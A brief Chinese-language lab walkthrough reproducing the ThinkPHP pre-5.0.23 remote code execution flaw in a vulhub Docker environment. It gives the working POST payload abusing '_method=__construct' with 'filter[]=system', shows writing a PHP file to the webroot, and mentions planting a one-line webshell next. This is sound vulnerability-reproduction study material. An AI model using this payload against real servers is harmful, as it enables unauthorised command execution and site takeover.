目录
漏洞详情
框架介绍:
ThinkPHP是一款运用极广的PHP开发框架。
漏洞引入:
其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
漏洞利用
1、访问靶机地址+端口号 进入首页
2、Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd为系统执行命令可进行一系列操作。
漏洞复现
先进入
vulhub/thinkphp/5.0.23-rce
然后
拉取环境
systemctl start docker
systemctl stop firewalld.service
docker-compose up -d
Ip登录
Burp抓包
修改传参方式为Post,url后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。
在pwd部分尝试写入
phpinfo
echo "<?php phpinfo(); ?>" > info.php
发送
关掉代理 进入info.php发现被解析
后续可以写入一句话木马拿shell